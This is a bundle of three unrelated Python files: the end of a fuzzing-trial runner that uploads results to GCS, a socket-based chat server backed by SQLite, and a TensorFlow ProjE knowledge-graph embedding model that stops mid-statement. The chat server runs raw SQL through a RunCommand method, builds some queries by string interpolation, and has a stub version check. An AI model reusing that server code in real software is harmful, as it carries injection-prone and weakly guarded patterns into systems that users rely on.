@retry.wrap(NUM_RETRIES, RETRY_DELAY,
'experiment.runner.TrialRunner.save_results')
def save_results(self):
"""Save the results directory to GCS."""
if not self.gcs_sync_dir:
return
# Copy results directory before rsyncing it so that we don't get an
# exception from uploading a file that changes in size. Files can change
# in size because the log file containing the fuzzer's output is in this
# directory and can be written to by the fuzzer at any time.
results_copy = filesystem.make_dir_copy(self.results_dir)
# Don't use parallel because it causes stability issues
# (crbug.com/1053309).
gsutil.rsync(results_copy,
posixpath.join(self.gcs_sync_dir, self.results_dir),
parallel=False)
def archive_directories(directories, archive_path):
"""Create a tar.gz file named |archive_path| containing the contents of each
directory in |directories|."""
with tarfile.open(archive_path, 'w:gz') as tar:
for directory in directories:
tar_directory(directory, tar)
def tar_directory(directory, tar):
"""Add the contents of |directory| to |tar|. Note that this should not
exception just because files and directories are being deleted from
|directory| while this function is being executed."""
directory = os.path.abspath(directory)
directory_name = os.path.basename(directory)
for root, _, files in os.walk(directory):
for filename in files:
file_path = os.path.join(root, filename)
arcname = os.path.join(directory_name,
os.path.relpath(file_path, directory))
try:
tar.add(file_path, arcname=arcname)
except (FileNotFoundError, OSError):
# We will get these errors if files or directories are being
# deleted from |directory| as we archive it. Don't bother
# rescanning the directory, new files will be archived in the
# next sync.
pass
except Exception: # pylint: disable=broad-except
logs.error('Unexpected exception occurred when archiving.')
def _is_path_excluded(path):
"""Is any part of |path| in |EXCLUDE_PATHS|."""
path_parts = path.split(os.sep)
for part in path_parts:
if not part:
continue
if part in EXCLUDE_PATHS:
return True
return False
def experiment_main():
"""Do a trial as part of an experiment."""
logs.info('Doing trial as part of experiment.')
try:
runner = TrialRunner()
runner.conduct_trial()
except Exception as error: # pylint: disable=broad-except
logs.error('Error doing trial.')
raise error
def main():
"""Do an experiment on a development machine or on a GCP runner instance."""
logs.initialize(
default_extras={
'benchmark': environment.get('BENCHMARK'),
'component': 'runner',
'fuzzer': environment.get('FUZZER'),
'trial_id': str(environment.get('TRIAL_ID')),
})
experiment_main()
return 0
if __name__ == '__main__':
sys.exit(main())
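# Environment sketch: the variables this runner reads via environment.get() above.
# The grouping below is editorial; no default values are implied.
#   FUZZ_TARGET, SEED_CORPUS_DIR, OUTPUT_CORPUS_DIR, MAX_TOTAL_TIME  - fuzzing inputs
#   BENCHMARK, FUZZER, FUZZER_VARIANT_NAME, EXPERIMENT, TRIAL_ID     - trial identity
#   LOCAL_EXPERIMENT, CLOUD_EXPERIMENT_BUCKET                        - GCS sync target
#   RUNNER_NICENESS, VIRTUALENV_DIR                                  - process setup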
|
server.py
|
import os
import json
import base64
import socket
import sqlite3
import datetime
from time import time, sleep
from dkv import demez_key_values as dkv
from uuid import uuid4, UUID
from threading import Thread
from api2.ftp_server import FTPServerAPI
from api2.listener import SocketListener
from api2.dir_tools import CreateDirectory
from api2.shared import *
# ----- These are needed for comparing client and server version -----
# update this whenever the json dict format or encoding/decoding is changed,
# like something that won't be compatible across versions in SendPacket and/or Listener is changed
PROTOCOL_VERSION = 1
PACKET_VERSION = 1
# how messages are sent/displayed,
MESSAGE_VERSION = 1
USER_INFO_VERSION = 1
SERVER_CONFIG_PATH = "server_config.dkv"
CreateDirectory("channels")
class ServerClient(BaseClient, Thread):
def __init__(self, server, connection: socket.socket, ip: str, port: int) -> None:
BaseClient.__init__(self, connection, ip, port)
Thread.__init__(self)
# we can wait for events on multiple sockets and then read and write data when it’s ready
self.socket.setblocking(True) # maybe try designing this with this set to false?
self.server = server
self.private_uuid = None
self.public_uuid = None
self.username = None
self.user_tag = None
self._uuid_verified = False
self.listener = SocketListener(self, self.socket)
self.listener.start()
self.event_function_dict.update({
"init_uuid": self.InitCheckUUID,
"request_uuid": self.InitRequestUUID,
"init_version": self.InitVersionCheck,
"user_info": self.ReceiveUserInfo,
"full_update": self.FullUpdate,
"receive_message": self.ReceiveMessage,
"send_message": self.ReceiveMessage,
"channel_messages": self.SendChannelMessageRange,
})
def WaitForResponse(self) -> dict:
try:
while True:
if self.listener.event_queue:
event = self.listener.event_queue[0]
self.listener.event_queue.remove(event)
return event
elif not self.listener.connected:
return {}
sleep(0.1)
except Exception as F:
PrintException(F, "Exception Waiting for Response: ")
return {}
def InitCheckUUID(self, uuid: Packet) -> None:
self.private_uuid = uuid.content["private"]
self.public_uuid = uuid.content["public"]
all_uuids = self.server.user_info_file.GetAllPrivateUUIDS()
        if self.private_uuid not in all_uuids:  # and \
# str(self.public_uuid) not in self.server.user_info_file.GetAllPublicUUIDS():
self.SendPacket("wrong_uuid")
self.WaitForResponse()
self.Disconnect()
else:
self.SendPacket("valid_uuid")
self._uuid_verified = True
self.listener.uuid_verified = True
def InitRequestUUID(self, placeholder: Packet = None) -> None:
self.private_uuid = str(self.server.user_info_file.MakePrivateUUID())
self.public_uuid = str(self.server.user_info_file.MakePublicUUID())
self.SendPacket("send_uuid", {"private": self.private_uuid, "public": self.public_uuid})
self.server.ftp_server.AddUser(self.public_uuid, self.private_uuid)
self._uuid_verified = True
self.listener.uuid_verified = True
def InitVersionCheck(self, client_version: int) -> None:
pass
def FullUpdate(self, placeholder: Packet = None) -> None:
self.SendPacket("channel_list", self.server.GetChannelList())
self.SendPacket("member_list", {"member_list": self.server.user_info_file.GetAllUsersPublic()})
self.SendPacket("server_info", {"server_name": self.server.name})
def ReceiveUserInfo(self, user_info: Packet) -> None:
self.username = user_info.content["username"]
if "user_info" not in user_info.content:
self.user_tag = self.server.user_info_file.MakeUserTag(self.username)
self.SendPacket("user_tag", {"user_tag": self.user_tag})
else:
self.user_tag = user_info.content["user_tag"]
self.server.user_info_file.HandleUserJoin(self.username, self.user_tag, str(self.public_uuid), str(self.private_uuid))
# self.FullUpdate()
def ReceiveMessage(self, message: Packet) -> None:
channel = self.server.GetChannel(message.content["channel"])
channel.AddMessage(message)
message.content["recv"] = message.recv
self.server.Broadcast("receive_message", message.content)
def SendChannelMessageRange(self, event_dict: Packet) -> None:
# ask for a section of the channel event history
channel = self.server.GetChannel(event_dict.content["channel_name"])
channel_page = channel.GetMessages(event_dict.content["message_index"],
50, # might allow client to request more than 50 messages at a time
# also would need to check across event function versions
event_dict.content["direction"])
# channel_page = channel.GetAllMessagesTest()
self.SendPacket("channel_messages", {
"channel_name": event_dict.content["channel_name"],
"start_message": event_dict.content["message_index"],
"message_count": 50,
"messages": channel_page,
})
def HandleEvent(self, packet: Packet) -> None:
if packet.event in self.event_function_dict.keys():
if packet.content:
self.event_function_dict[packet.event](packet)
else:
self.event_function_dict[packet.event]()
else:
TimePrint("Unknown Event: " + packet.event)
def Ping(self) -> None:
self.SendPacket("ping")
def SendDisconnect(self, reason: str):
self.SendPacket("disconnect", {"reason": reason})
def Disconnect(self):
self.socket.close()
self.listener.Stop()
self.server.RemoveClient(self)
self._stopping = True
TimePrint(f"Disconnected - {self.address}")
def run(self) -> None:
TimePrint("socket running")
try:
while True:
while len(self.listener.event_queue) > 0:
event = self.listener.event_queue[0]
self.listener.event_queue.remove(event)
self.HandleEvent(event)
if self._stopping or not self.listener.connected:
self.Disconnect()
break
                # this loop was pinning a CPU core (~10% usage) and slowing the whole
                # program down, so sleep for 0.1 seconds between iterations
sleep(0.1)
except Exception as F:
self.SendDisconnect(" ".join(F.args))
PrintException(F, "Exception On Client Loop, Disconnecting Client: ")
self.Disconnect()
# note: clients do not need to hold channel handles here;
# just connect to the channel's database file whenever something needs to be read or written
class Channel:
def __init__(self, name: str, description: str = "") -> None:
self.name = name
self.description = description
file = sqlite3.connect("channels/" + name + ".db")
crsr = file.cursor()
# do we have a message table here?
try:
# why does this not work
# CHECK(TYPEOF(time) == 'FLOAT')
# CHECK(TYPEOF(user) == 'CHAR')
# CREATE TABLE if not exists messages
crsr.execute("""
CREATE TABLE messages (
time FLOAT,
user CHAR(36) NOT NULL,
text TEXT(4096)
);""")
        except sqlite3.OperationalError as F:
            # most likely the messages table already exists
            print(str(F))
        finally:
            file.commit()
            file.close()
def GetMessageCount(self) -> int:
file, cursor = self.OpenFile()
cursor.execute("select count (*) from messages;")
message_count = cursor.fetchone()[0]
file.close()
return message_count
def ConnectToFile(self) -> sqlite3.Connection:
return sqlite3.connect("channels/" + self.name + ".db")
@staticmethod
def SaveAndClose(file: sqlite3.Connection) -> None:
file.commit()
file.close()
def GetCursor(self) -> sqlite3.Cursor:
return self.ConnectToFile().cursor()
def OpenFile(self) -> tuple:
file = self.ConnectToFile()
return file, file.cursor()
def DeleteEvent(self, event) -> None:
file, cursor = self.OpenFile()
# delete
# cursor.execute("""DROP TABLE employee;""")
    def ExceptExecute(self):
pass
# TODO: fix being able to put quotes in here, it doesn't work
def AddMessage(self, message: Packet) -> None:
file, cursor = self.OpenFile()
# time_received = str(datetime.datetime.fromtimestamp(message["time_received"]))
cursor.execute(
"""INSERT INTO messages (time, user, text) VALUES (?, ?, ?);""",
(message.recv, message.content["name"], message.content["text"]))
self.SaveAndClose(file)
def GetAllMessagesTest(self) -> list:
file, cursor = self.OpenFile()
cursor.execute("SELECT * FROM messages ORDER BY time ASC")
messages = cursor.fetchall()
file.close()
return messages
def GetMessages(self, start_message_index: int, message_count: int, msg_direction: str) -> dict:
total_message_count = self.GetMessageCount() - 1
file, cursor = self.OpenFile()
if msg_direction == "back":
start_message_index -= 1
direction = "DESC"
elif msg_direction == "forward":
start_message_index += 1
direction = "ASC"
else:
return {}
        # note: the sort direction cannot be passed as a query parameter, so it is
        # interpolated into the SQL string; only the LIMIT value is parameterized
        # (an OFFSET-based variant was attempted here but left unfinished)
        cmd = f"SELECT * from messages ORDER BY time {direction} limit ?"
        try:
            cursor.execute(cmd, (message_count,))
except Exception as F:
PrintException(F, "Exception Getting Messages From Channel File: ")
return {}
messages = cursor.fetchall()
file.close()
message_dict = {}
if direction == "DESC":
for index, message in enumerate(messages):
message_dict[start_message_index - index] = message
elif direction == "ASC":
# TODO: test this
for index, message in enumerate(messages):
message_dict[start_message_index + index] = message
return message_dict
def RunCommand(self, command: str):
file, cursor = self.OpenFile()
output = cursor.execute(command)
self.SaveAndClose(file)
return output
# TODO: add search tags, or make functions to call depending on the tags
def Search(self, string: str) -> None:
return
# TODO: make a server config file, like how we have a user config file for clients
class Server:
def __init__(self, name: str, ip: str, port: int, ftp_ip: str, ftp_port: int, max_clients: int) -> None:
self.name = name
self.ip = ip
self.port = int(port)
self.max_clients = int(max_clients)
self.ftp_server = FTPServerAPI(self, int(max_clients), ftp_ip, int(ftp_port))
self.client_uuid_list = {}
self.channel_list = []
self.user_info_file = UserInfoFile()
self.server_config = ServerConfig(self)
for user in self.user_info_file.users:
self.ftp_server.AddUser(user.public_uuid, user.private_uuid)
# The first argument AF_INET is the combined_address domain of the socket.
# This is used when we have an Internet Domain with any two hosts.
# The second argument is the type of socket.
# SOCK_STREAM means that data or characters are read in a continuous flow.
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.client_list = []
self.con_var_list = []
self.con_command_dict = {
"find": self.Find, # TODO: move to cli_server?
# "add_channel": self.AddChannel,
# "rm_channel": self.RemoveChannel,
}
self.Start()
def Start(self) -> None:
self.socket.bind((self.ip, self.port))
Thread(target=self.ListenForClients, args=()).start()
Thread(target=self.ListenConsole, args=()).start() # TODO: remove this and move to cli version
Thread(target=self.ftp_server.StartServer, args=()).start()
def Close(self) -> None:
self.socket.close()
TimePrint("Server closed")
def GetChannelList(self) -> dict:
channel_dict = {}
for channel in self.channel_list:
channel_dict[channel.name] = {
"desc": channel.description,
"count": channel.GetMessageCount(),
}
return channel_dict
    def GetChannel(self, channel_name: str) -> Channel:
        for channel in self.channel_list:
            if channel.name == channel_name:
                return channel
        raise Exception("Channel does not exist")
def RemoveClient(self, client: ServerClient) -> None:
        if client in self.client_list:
            self.client_list.remove(client)
TimePrint("-------- {0} disconnected --------".format(client.address))
del client
    # used to push an event (e.g. a received message) out to every connected client
    def Broadcast(self, command: str, *args) -> None:
        for client in self.client_list:
            client.SendPacket(command, *args)
def Find(self, search: str) -> None:
result = []
for con_command in self.con_command_dict.keys():
if search in con_command:
result.append(con_command)
if result:
print(" - " + "\n - ".join(result))
else:
print("No results for \"" + search + "\" found")
# this will handle ConVars
def ListenConsole(self) -> None:
while True:
try:
command = input()
# TODO: make sure we don't split by spaces in quotes
command_split = command.split(" ")
if command_split[0] in self.con_command_dict.keys():
self.con_command_dict[command_split[0]](*command_split[1:])
except Exception as F:
PrintException(F, "Exception Listening from Console (somehow): ")
def SendBytes(self, client, _bytes: bytes) -> bool:
try:
client.send(_bytes)
return True
except Exception as F:
PrintException(F, "Exception Sending Bytes: ")
client.close()
self.RemoveClient(client)
return False
def ListenForClients(self) -> None:
# self.socket.setblocking(False)
self.socket.listen(self.max_clients)
TimePrint("Server started on {0}:{1}".format(self.ip, str(self.port)))
while True:
try:
"""Accepts a connection request and stores two parameters,
conn which is a socket object for that user, and addr
which contains the IP combined_address of the socket that just
connected"""
conn, addr = self.socket.accept()
# prints the combined_address of the user that just connected
TimePrint(f"Connected - {addr}")
# creates and individual thread for every user that connects
client = ServerClient(self, conn, *addr)
client.start()
self.client_list.append(client)
except KeyboardInterrupt:
self.Close()
break
except Exception as F:
PrintException(F, "Exception Listening For Clients, continuing: ")
continue
class UserInfo:
def __init__(self, username: str = "", user_tag: int = 0, user_picture: str = "", public_uuid: str = "",
private_uuid: str = "", join_date: float = 0.0, last_seen: float = 0.0):
self.username = username
self.user_tag = user_tag
self.user_picture = user_picture
self.public_uuid = public_uuid
self.private_uuid = private_uuid
self.join_date = join_date
self.last_seen = last_seen
def Update(self, username: str = "", user_picture: str = "", last_seen: float = 0.0):
self.username = username
self.user_picture = user_picture
self.last_seen = last_seen
class UserInfoFile:
def __init__(self) -> None:
self.users = []
if not os.path.isfile("user_info.db"):
file, crsr = self.OpenFile()
try:
# username VARCHAR(48)
crsr.execute("""
CREATE TABLE users (
username VARCHAR(48) NOT NULL,
user_tag TINYINT NOT NULL,
user_picture TEXT(2048),
public_uuid CHAR(16) NOT NULL,
private_uuid CHAR(16) NOT NULL,
join_date DATETIME NOT NULL,
last_seen DATETIME NOT NULL
);""")
except sqlite3.OperationalError as F:
print(str(F))
else:
self.InitUsers()
@staticmethod
def ConnectToFile() -> sqlite3.Connection:
return sqlite3.connect("user_info.db")
@staticmethod
def SaveAndClose(file) -> None:
file.commit()
file.close()
def OpenFile(self) -> tuple:
file = self.ConnectToFile()
return file, file.cursor()
def InitUsers(self) -> None:
user_list = self.GetAllUsers()
for user_tuple in user_list:
user = UserInfo(*user_tuple)
self.users.append(user)
def GetUserCount(self) -> int:
file, cursor = self.OpenFile()
cursor.execute("select count (*) from users;")
user_count = cursor.fetchone()[0]
file.close()
return int(user_count)
# changes all tuples in a list to the first value and changes it in the list
@staticmethod
def _TupleToStringInList(tuple_list: list):
for index, item in enumerate(tuple_list):
tuple_list[index] = item[0]
def _GetColumns(self, *columns) -> list:
file, cursor = self.OpenFile()
cursor.execute(f"""SELECT {', '.join(columns)} from users""")
found_columns = cursor.fetchall()
file.close()
if len(columns) == 1 and columns[0] != "*":
self._TupleToStringInList(found_columns)
return found_columns if type(found_columns) == list else []
def GetAllUsersPublic(self) -> dict:
user_dict = {}
user_list = self._GetColumns("username", "user_tag", "user_picture", "join_date", "last_seen", "public_uuid")
for user in user_list:
user_dict[user[-1]] = user[:-1]
return user_dict
def GetAllUsers(self) -> list:
return self._GetColumns("*")
def GetUserNames(self) -> list:
return self._GetColumns("username")
def GetAllPrivateUUIDS(self) -> list:
# um = self._GetColumn("(public_uuid, private_uuid)")
return self._GetColumns("private_uuid")
def GetAllPublicUUIDS(self) -> list:
return self._GetColumns("public_uuid")
def IsUserAddedPrivate(self, private_uuid: str) -> bool:
return self._IsUserAddedInternal("private_uuid", private_uuid)
def IsUserAdded(self, public_uuid: str) -> bool:
return self._IsUserAddedInternal("public_uuid", public_uuid)
def _IsUserAddedInternal(self, uuid_type: str, uuid: str) -> bool:
return uuid in self._GetColumns(uuid_type)
def GetUserInfoPrivate(self, private_uuid: str) -> UserInfo:
for user_info in self.users:
if user_info.private_uuid == private_uuid:
return user_info
def GetUserInfo(self, public_uuid: str) -> UserInfo:
for user_info in self.users:
if user_info.public_uuid == public_uuid:
return user_info
@staticmethod
def _MakeUUID(uuid_list: list) -> UUID:
while True:
new_uuid = uuid4()
if str(new_uuid) not in uuid_list:
return new_uuid
def MakePrivateUUID(self) -> UUID:
return self._MakeUUID(self.GetAllPrivateUUIDS())
def MakePublicUUID(self) -> UUID:
return self._MakeUUID(self.GetAllPublicUUIDS())
    def MakeUserTag(self, username: str) -> int:
        # GetUserNames() returns plain strings, so count the username itself
        return self.GetUserNames().count(username)
def HandleUserJoin(self, username: str, user_tag: int, public_uuid: str, private_uuid: str, user_picture: str = ""):
if self.IsUserAddedPrivate(private_uuid):
self.UpdateUserInfo(public_uuid, username, user_picture, datetime.datetime.now().timestamp())
else:
self.AddUser(username, user_tag, public_uuid, private_uuid, user_picture)
def HandleUserLeave(self, public_uuid: str):
self.UpdateUserInfo(public_uuid, "", "", datetime.datetime.now().timestamp())
def AddUser(self, username: str, user_tag: int, public_uuid: str, private_uuid: str, user_picture: str = ""):
file, cursor = self.OpenFile()
join_date = datetime.datetime.now().timestamp()
user_tuple = (username, user_tag, user_picture, public_uuid, private_uuid, join_date, join_date)
cursor.execute(
"""INSERT INTO users (username, user_tag, user_picture, public_uuid, private_uuid, join_date, last_seen)
VALUES (?, ?, ?, ?, ?, ?, ?);""", user_tuple)
user = UserInfo(*user_tuple)
self.users.append(user)
self.SaveAndClose(file)
    def UpdateUserInfo(self, public_uuid: str, username: str = "", user_picture: str = "", last_seen: float = -1.0):
        file, cursor = self.OpenFile()
        user_info = self.GetUserInfo(public_uuid)
        user_info.Update(username, user_picture, last_seen)
        # restrict the update to this user's row; without the WHERE clause every row would be overwritten
        cursor.execute(
            "UPDATE users SET username = ?, user_picture = ?, last_seen = ? WHERE public_uuid = ?;",
            (username, user_picture, last_seen, public_uuid))
        self.SaveAndClose(file)
class ServerConfig:
def __init__(self, server: Server) -> None:
try:
self.dkv_input = dkv.ReadFile(SERVER_CONFIG_PATH)
except FileNotFoundError:
# create an empty file
with open(SERVER_CONFIG_PATH, "w", encoding="utf-8") as file:
pass
self.dkv_input = dkv.DemezKeyValueRoot()
server_name = self.dkv_input.GetItem("name")
if server_name:
server.name = server_name.value
else:
server.name = "default"
self.dkv_input.AddItem("name", "default")
channel_list = self.dkv_input.GetItem("channels")
if channel_list:
for channel_dkv in channel_list.value:
channel = Channel(channel_dkv.key)
server.channel_list.append(channel)
else:
self.dkv_input.AddItem("channels", []).AddItem("default", [])
channel = Channel("default")
server.channel_list.append(channel)
user_uuid_list = self.dkv_input.GetItem("user_uuids")
if user_uuid_list:
for user_uuid in user_uuid_list.value:
server.client_uuid_list[user_uuid.key] = UUID(user_uuid.key)
else:
self.dkv_input.AddItem("user_uuids", [])
print("server config done")
def AddChannel(self, channel_name: str) -> None:
self.dkv_input.GetItem("channels").AddItem(channel_name, [])
self.WriteChanges()
def SetServerName(self, server_name: str) -> None:
self.dkv_input.GetItem("name").value = server_name
self.WriteChanges()
def WriteChanges(self) -> None:
if os.path.isfile(SERVER_CONFIG_PATH):
os.rename(SERVER_CONFIG_PATH, SERVER_CONFIG_PATH + ".bak")
with open(SERVER_CONFIG_PATH, "w", encoding="utf-8") as file:
file.write(self.dkv_input.ToString())
if os.path.isfile(SERVER_CONFIG_PATH + ".bak"):
os.remove(SERVER_CONFIG_PATH + ".bak")
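# Minimal launch sketch (illustrative only; the real entry point and its
# configuration values live outside this file, so every value below is assumed):
#   if __name__ == "__main__":
#       server = Server(name="test server", ip="0.0.0.0", port=8001,
#                       ftp_ip="0.0.0.0", ftp_port=8021, max_clients=32)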
|
ProjE_sigmoid.py
|
import argparse
import math
import os.path
import timeit
from multiprocessing import JoinableQueue, Queue, Process
import numpy as np
import tensorflow as tf
class ProjE:
@property
def n_entity(self):
return self.__n_entity
@property
def n_train(self):
return self.__train_triple.shape[0]
@property
def trainable_variables(self):
return self.__trainable
@property
def hr_t(self):
return self.__hr_t
@property
def tr_h(self):
return self.__tr_h
@property
def ent_embedding(self):
return self.__ent_embedding
@property
def rel_embedding(self):
return self.__rel_embedding
def training_data(self, batch_size=100):
n_triple = len(self.__train_triple)
rand_idx = np.random.permutation(n_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
hr_tlist, hr_tweight, tr_hlist, tr_hweight = self.corrupted_training(
self.__train_triple[rand_idx[start:end]])
yield hr_tlist, hr_tweight, tr_hlist, tr_hweight
start = end
def raw_training_data(self, batch_size=100):
n_triple = len(self.__train_triple)
rand_idx = np.random.permutation(n_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__train_triple[rand_idx[start:end]]
start = end
def testing_data(self, batch_size=100):
n_triple = len(self.__test_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__test_triple[start:end, :]
start = end
def validation_data(self, batch_size=100):
n_triple = len(self.__valid_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
            yield self.__valid_triple[start:end, :]
start = end
def corrupted_training(self, htr):
# [head(tail), relation, #of_total_positive_candidates, positive_instances..., negative_instances...]
hr_tlist = list()
hr_tweight = list()
tr_hlist = list()
tr_hweight = list()
for idx in range(htr.shape[0]):
if np.random.uniform(-1, 1) > 0: # t r predict h
tr_hweight.append(
[1. if x in self.__tr_h[htr[idx, 1]][htr[idx, 2]] else 0. for x in range(self.__n_entity)])
tr_hlist.append([htr[idx, 1], htr[idx, 2]])
else: # h r predict t
hr_tweight.append(
[1. if x in self.__hr_t[htr[idx, 0]][htr[idx, 2]] else 0. for x in range(self.__n_entity)])
hr_tlist.append([htr[idx, 0], htr[idx, 2]])
return np.asarray(hr_tlist, dtype=np.int32), np.asarray(hr_tweight, dtype=np.float32), \
np.asarray(tr_hlist, dtype=np.int32), np.asarray(tr_hweight, dtype=np.float32)
def __init__(self, data_dir, embed_dim=100, combination_method='simple', dropout=0.5, neg_weight=0.5):
if combination_method.lower() not in ['simple', 'matrix']:
raise NotImplementedError("ProjE does not support using %s as combination method." % combination_method)
self.__combination_method = combination_method
self.__embed_dim = embed_dim
self.__initialized = False
self.__trainable = list()
self.__dropout = dropout
with open(os.path.join(data_dir, 'entity2id.txt'), 'r', encoding='utf-8') as f:
self.__n_entity = len(f.readlines())
with open(os.path.join(data_dir, 'entity2id.txt'), 'r', encoding='utf-8') as f:
self.__entity_id_map = {x.strip().split('\t')[0]: int(x.strip().split('\t')[1]) for x in f.readlines()}
self.__id_entity_map = {v: k for k, v in self.__entity_id_map.items()}
print("N_ENTITY: %d" % self.__n_entity)
with open(os.path.join(data_dir, 'relation2id.txt'), 'r', encoding='utf-8') as f:
self.__n_relation = len(f.readlines())
with open(os.path.join(data_dir, 'relation2id.txt'), 'r', encoding='utf-8') as f:
self.__relation_id_map = {x.strip().split('\t')[0]: int(x.strip().split('\t')[1]) for x in f.readlines()}
        self.__id_relation_map = {v: k for k, v in self.__relation_id_map.items()}
print("N_RELATION: %d" % self.__n_relation)
def load_triple(file_path):
with open(file_path, 'r', encoding='utf-8') as f_triple:
return np.asarray([[self.__entity_id_map[x.strip().split('\t')[0]],
self.__entity_id_map[x.strip().split('\t')[1]],
self.__relation_id_map[x.strip().split('\t')[2]]] for x in f_triple.readlines()],
dtype=np.int32)
def gen_hr_t(triple_data):
hr_t = dict()
for h, t, r in triple_data:
if h not in hr_t:
hr_t[h] = dict()
if r not in hr_t[h]:
hr_t[h][r] = set()
hr_t[h][r].add(t)
return hr_t
def gen_tr_h(triple_data):
tr_h = dict()
for h, t, r in triple_data:
if t not in tr_h:
tr_h[t] = dict()
if r not in tr_h[t]:
tr_h[t][r] = set()
tr_h[t][r].add(h)
return tr_h
self.__train_triple = load_triple(os.path.join(data_dir, 'train.txt'))
print("N_TRAIN_TRIPLES: %d" % self.__train_triple.shape[0])
self.__test_triple = load_triple(os.path.join(data_dir, 'test.txt'))
print("N_TEST_TRIPLES: %d" % self.__test_triple.shape[0])
self.__valid_triple = load_triple(os.path.join(data_dir, 'valid.txt'))
print("N_VALID_TRIPLES: %d" % self.__valid_triple.shape[0])
self.__train_hr_t = gen_hr_t(self.__train_triple)
self.__train_tr_h = gen_tr_h(self.__train_triple)
self.__test_hr_t = gen_hr_t(self.__test_triple)
self.__test_tr_h = gen_tr_h(self.__test_triple)
self.__hr_t = gen_hr_t(np.concatenate([self.__train_triple, self.__test_triple, self.__valid_triple], axis=0))
self.__tr_h = gen_tr_h(np.concatenate([self.__train_triple, self.__test_triple, self.__valid_triple], axis=0))
bound = 6 / math.sqrt(embed_dim)
with tf.device('/cpu'):
self.__ent_embedding = tf.get_variable("ent_embedding", [self.__n_entity, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=345))
self.__trainable.append(self.__ent_embedding)
self.__rel_embedding = tf.get_variable("rel_embedding", [self.__n_relation, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=346))
self.__trainable.append(self.__rel_embedding)
if combination_method.lower() == 'simple':
self.__hr_weighted_vector = tf.get_variable("simple_hr_combination_weights", [embed_dim * 2],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=445))
self.__tr_weighted_vector = tf.get_variable("simple_tr_combination_weights", [embed_dim * 2],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=445))
self.__trainable.append(self.__hr_weighted_vector)
self.__trainable.append(self.__tr_weighted_vector)
self.__hr_combination_bias = tf.get_variable("combination_bias_hr",
initializer=tf.zeros([embed_dim]))
self.__tr_combination_bias = tf.get_variable("combination_bias_tr",
initializer=tf.zeros([embed_dim]))
self.__trainable.append(self.__hr_combination_bias)
self.__trainable.append(self.__tr_combination_bias)
else:
self.__hr_combination_matrix = tf.get_variable("matrix_hr_combination_layer",
[embed_dim * 2, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=555))
self.__tr_combination_matrix = tf.get_variable("matrix_tr_combination_layer",
[embed_dim * 2, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=555))
self.__trainable.append(self.__hr_combination_matrix)
self.__trainable.append(self.__tr_combination_matrix)
self.__hr_combination_bias = tf.get_variable("combination_bias_hr",
initializer=tf.zeros([embed_dim]))
self.__tr_combination_bias = tf.get_variable("combination_bias_tr",
initializer=tf.zeros([embed_dim]))
self.__trainable.append(self.__hr_combination_bias)
self.__trainable.append(self.__tr_combination_bias)
@staticmethod
def __l1_normalize(x, dim, epsilon=1e-12, name=None):
square_sum = tf.reduce_sum(tf.abs(x), [dim], keep_dims=True)
x_inv_norm = tf.rsqrt(tf.maximum(square_sum, epsilon))
return tf.mul(x, x_inv_norm, name=name)
@staticmethod
def sampled_softmax(tensor, weights):
max_val = tf.reduce_max(tensor * tf.abs(weights), 1, keep_dims=True)
tensor_rescaled = tensor - max_val
tensor_exp = tf.exp(tensor_rescaled)
tensor_sum = tf.reduce_sum(tensor_exp * tf.abs(weights), 1, keep_dims=True)
return (tensor_exp / tensor_sum) * tf.abs(weights) # all ignored elements will have a prob of 0.
def train(self, inputs, regularizer_weight=1., scope=None):
with tf.variable_scope(scope or type(self).__name__) as scp:
if self.__initialized:
scp.reuse_variables()
rel_embedding = self.__rel_embedding
normalized_ent_embedding = self.__ent_embedding
hr_tlist, hr_tlist_weight, tr_hlist, tr_hlist_weight = inputs
# (?, dim)
hr_tlist_h = tf.nn.embedding_lookup(normalized_ent_embedding, hr_tlist[:, 0])
hr_tlist_r = tf.nn.embedding_lookup(rel_embedding, hr_tlist[:, 1])
# (?, dim)
tr_hlist_t = tf.nn.embedding_lookup(normalized_ent_embedding, tr_hlist[:, 0])
tr_hlist_r = tf.nn.embedding_lookup(rel_embedding, tr_hlist[:, 1])
if self.__combination_method.lower() == 'simple':
# shape (?, dim)
hr_tlist_hr = hr_tlist_h * self.__hr_weighted_vector[
:self.__embed_dim] + hr_tlist_r * self.__hr_weighted_vector[
self.__embed_dim:]
hrt_res = tf.matmul(tf.nn.dropout(tf.tanh(hr_tlist_hr + self.__hr_combination_bias), self.__dropout),
self.__ent_embedding,
transpose_b=True)
tr_hlist_tr = tr_hlist_t * self.__tr_weighted_vector[
:self.__embed_dim] + tr_hlist_r * self.__tr_weighted_vector[
self.__embed_dim:]
trh_res = tf.matmul(tf.nn.dropout(tf.tanh(tr_hlist_tr + self.__tr_combination_bias), self.__dropout),
self.__ent_embedding,
transpose_b=True)
self.regularizer_loss = regularizer_loss = tf.reduce_sum(
tf.abs(self.__hr_weighted_vector)) + tf.reduce_sum(tf.abs(
self.__tr_weighted_vector)) + tf.reduce_sum(tf.abs(self.__ent_embedding)) + tf.reduce_sum(
tf.abs(self.__rel_embedding))
else:
hr_tlist_hr = tf.nn.dropout(tf.tanh(tf.matmul(tf.concat(1, [hr_tlist_h, hr_tlist_r]),
self.__hr_combination_matrix) + self.__hr_combination_bias),
self.__dropout)
hrt_res = tf.matmul(hr_tlist_hr, self.__ent_embedding, transpose_b=True)
tr_hlist_tr = tf.nn.dropout(tf.tanh(tf.matmul(tf.concat(1, [tr_hlist_t, tr_hlist_r]),
self.__tr_combination_matrix) + self.__tr_combination_bias),
self.__dropout)
trh_res = tf.matmul(tr_hlist_tr, self.__ent_embedding, transpose_b=True)
self.regularizer_loss = regularizer_loss = tf.reduce_sum(
tf.abs(self.__hr_combination_matrix)) + tf.reduce_sum(tf.abs(
self.__tr_combination_matrix)) + tf.reduce_sum(tf.abs(self.__ent_embedding)) + tf.reduce_sum(
